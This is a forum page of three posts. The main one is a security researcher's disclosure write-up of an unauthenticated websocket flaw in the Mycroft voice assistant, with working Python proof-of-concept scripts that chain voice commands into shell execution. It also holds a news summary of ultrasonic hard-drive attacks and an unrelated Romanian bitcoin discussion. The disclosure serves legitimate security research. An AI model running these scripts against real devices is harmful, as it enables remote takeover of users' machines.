  12. "Hey Mycroft, we've got a Problem" Getting "Zero Click" Remote Code Execution in Mycroft AI vocal assistant Introduction During my journey contributing to open source I was working with my friend Matteo De Carlo on an AUR Package of a really interesting project called Mycroft AI. It's an AI-powered vocal assistant started with a crowdfunding campaign in 2015 and a more recent one that allowed Mycroft to produce their Mark-I and Mark-II devices. It's also running on Linux Desktop/Server, Raspberry PI and will be available soon™ on Jaguar Type-F and Land Rover Digging in the source code While looking at the source code I found an interesting point: here ... host = config.get("host") port = config.get("port") route = config.get("route") validate_param(host, "websocket.host") validate_param(port, "websocket.port") validate_param(route, "websocket.route") routes = [ (route, WebsocketEventHandler) ] application = web.Application(routes, **settings) application.listen(port, host) ioloop.IOLoop.instance().start() ... So there is a websocket server that doesn't require authentication that by default is exposed on 0.0.0.0:8181/core. Let's test it #!/usr/bin/env python import asyncio import websockets uri = "ws://myserver:8181/core" command = "say pwned" async def sendPayload(): async with websockets.connect(uri) as websocket: await websocket.send("{\"data\": {\"utterances\": [\""+command+"\"]}, \"type\": \"recognizer_loop:utterance\", \"context\": null}") asyncio.get_event_loop().run_until_complete(sendPayload()) And magically we have an answer from the vocal assistant saying pwned! Well, now we can have Mycroft pronounce stuff remotely, but this is not a really big finding unless you want to scare your friends, right? The skills system Digging deeper we can see that Mycroft has a skills system and a default skill that can install others skills (pretty neat, right?) How is a skill composed? From what we can see from the documentation a default skill is composed by: dialog/en-us/command.dialog contains the vocal command that will trigger the skill vocab/en-us/answer.voc contains the answer that Mycroft will pronounce requirements.txt contains the requirements for the skill that will be installed with pip __int__.py contains the main function of the skill and will be loaded when the skill is triggered What can I do? I could create a malicious skill that when triggered runs arbitrary code on the remote machine, but unfortunately this is not possible via vocal command unless the URL of the skill is not whitelisted via the online website. So this is possible but will be a little tricky. So I'm done? Not yet. I found out that I can trigger skills remotely and that is possible to execute commands on a remote machine convincing the user to install a malicious skill. I may have enough to submit a vulnerability report. But maybe I can do a bit better... Getting a remote shell using default skills We know that Mycroft has some default skills like open that will open an application and others that are whitelisted but not installed. Reading through to the list, I found a really interesting skill called skill-autogui, whose description says Manipulate your mouse and keyboard with Mycroft. We got it! Let's try to combine everything we found so far into a PoC: #!/usr/bin/env python import sys import asyncio import websockets import time cmds = ["mute audio"] + sys.argv[1:] uri = "ws://myserver:8181/core" async def sendPayload(): for payload in cmds: async with websockets.connect(uri) as websocket: await websocket.send("{\"data\": {\"utterances\": [\""+payload+"\"]}, \"type\": \"recognizer_loop:utterance\", \"context\": null}") time.sleep(1) asyncio.get_event_loop().run_until_complete(sendPayload()) Running the exploit with python pwn.py "install autogui" "open xterm" "type echo pwned" "press enter" allowed me to finally get a command execution on a Linux machine. Notes open xterm was needed because my test Linux environment had a DE installed, on a remote server the commands will be executed directly on TTY so this step is not nesessary. The skill branching had a big change and now some skills are not (yet) available (autogui is one of them) but this is not the real point. Mycroft has skills to interact with domotic houses and other services that can still be manipulated (the lack of imagination is the limit here). The vulnerability lies in the lack of authentication for the ws. Affected devices All the devices running Mycroft <= ? with the websocket server exposed (Mark-I has the websocket behind a firewall by default) Interested in my work? Follow me on: Twitter: @0x7a657461 Linkedin: https://linkedin.com/in/0xzeta GitHub: https://github.com/Nhoya Timeline 08/03/2018 Vulnerability found 09/03/2018 Vulnerability reported 13/03/2018 The CTO answered that they are aware of this problem and are currently working on a patch 06/06/2018 The CTO said that they have no problem with the release of the vulnerability and will add a warning to remember the user to use a firewall ¯\_(ツ)_/¯ 09/06/2018 Public disclosure Source
    1 point
  13. Researchers have demonstrated how sonic and ultrasonic signals (inaudible to human) can be used to cause physical damage to hard drives just by playing ultrasonic sounds through a target computer's own built-in speaker or by exploiting a speaker near the targeted device. Similar research was conducted last year by a group of researchers from Princeton and Purdue University, who demonstrated a denial-of-service (DoS) attack against HDDs by exploiting a physical phenomenon called acoustic resonance. Since HDDs are exposed to external vibrations, researchers showed how specially crafted acoustic signals could cause significant vibrations in HDDs internal components, which eventually leads to the failure in systems that relies on the HDD. To prevent a head crash from acoustic resonance, modern HDDs use shock sensor-driven feedforward controllers that detect such movement and improve the head positioning accuracy while reading and writing the data. However, according to a new research paper published by a team of researchers from the University of Michigan and Zhejiang University, sonic and ultrasonic sounds causes false positives in the shock sensor, causing a drive to unnecessarily park its head. By exploiting this disk drive vulnerability, researchers demonstrated how attackers could carry out successful real-world attacks against HDDs found in CCTV (Closed-Circuit Television) systems and desktop computers. These attacks can be performed using a nearby external speaker or through the target system's own built-in speakers by tricking the user into playing a malicious sound attached to an email or a web page. In their experimental set-up, the researchers tested acoustic and ultrasonic interferences against various HDDs from Seagate, Toshiba and Western Digital and found that ultrasonic waves took just 5-8 seconds to induce errors. However, sound interferences that lasted for 105 seconds or more caused the stock Western Digital HDD in the video-surveillance device to stop recording from the beginning of the vibration until the device was restarted. The researchers were also able to disrupt HDDs in desktops and laptops running both Windows and Linux operating system. They took just 45 seconds to cause a Dell XPS 15 9550 laptop to freeze and 125 seconds to crash when the laptop was tricked to play malicious audio over its built-in speaker. The team also proposed some defenses that can be used to detect or prevent such type of attacks, including a new feedback controller that could be deployed as a firmware update to attenuate the intentional acoustic interference, a sensor fusion method to prevent unnecessary head parking by detecting ultrasonic triggering of the shock sensor, and noise dampening materials to attenuate the signal. You can find out more about HDD ultrasonic acoustic attacks in a research paper [PDF] titled "Blue Note: How Intentional Acoustic Interference Damages Availability and Integrity in Hard Disk Drives and Operating Systems." Via thehackernews.com
    1 point
  14. Ii un cerc, sper ca nu vreti sa va desenez? Cutarescu vinde mancare, plateste angajati care la randul lor cheltuie bani pe mancare, intretinere, masina si alte cacaturi, acestea fiind produse de Cutarescu 2 si 3. Investitia lui Cutarescu se duce in chirie (locatia a fost construita de cineva iarasi un cerc), materie prima etc etc. Consumatorii pierd, aia care traiesc de pe o luna pe alta pentru ca trebuie sa supravietuiasca. De aia exemplul cu mancarea nu prea se potriveste cu bitcointul. Mancarea intra la necessity good (Necessity goods are goods that we cannot live without and will not likely cut back on even when times are tough, for example food, power, water and gas). Nici despre substitute good nu strica sa stiti, de la "optiuni decente" pana la "monopol" ii cale lunga. Nu este Subway dar o chifla si doua felii de parizer tot isi cumpara de la magazin. Falimentul ii doar rezultatul autoreglari pietei. Deschide Cutarescu fast food, erau deja 4 unitati dar oferta nu depasea cererea. Se inverseaza balanta, oferta depasea cererea si cel mai slab/neperformant va trage oblonul. Simplu. Mai scade si pretul, exemplu cel mai bun ii pretul petrolului. Revenind la bitcoin, sa intelegi/vizualizezi ca cineva tot timpul pierde trebuie sa inchizi cercul, mai exact sa scoti tot capitalul investit, sa ajungi din nou la 0. Sau pretul sa fie 1000, urca la 2000 si coboara din nou la 1000, acelasi lucru. La Fiat, statul poate sa pompeze bani cum a facut America in timpul crizelor economice. Era un documentar in care se zicea ca SUA a iesit din criza anilor '30 doar dupa ce a intrat in Al Doilea Razboi Mondial. https://en.wikipedia.org/wiki/File:US_Unemployment_1910-1960.gif Edit: Documentar https://youtu.be/CkHooEp3vRE?t=41m1s Un alt contex unde se observa ca cine pierde ii daca avem un scenariu in care toti vand la pretul cu care au cumparat (utopie). In acest caz nimeni nu pierde dar nici nu castiga, la polul opus tot timpul cineva va pierde cand se trage linie.
    1 point
×
×
  • Create New...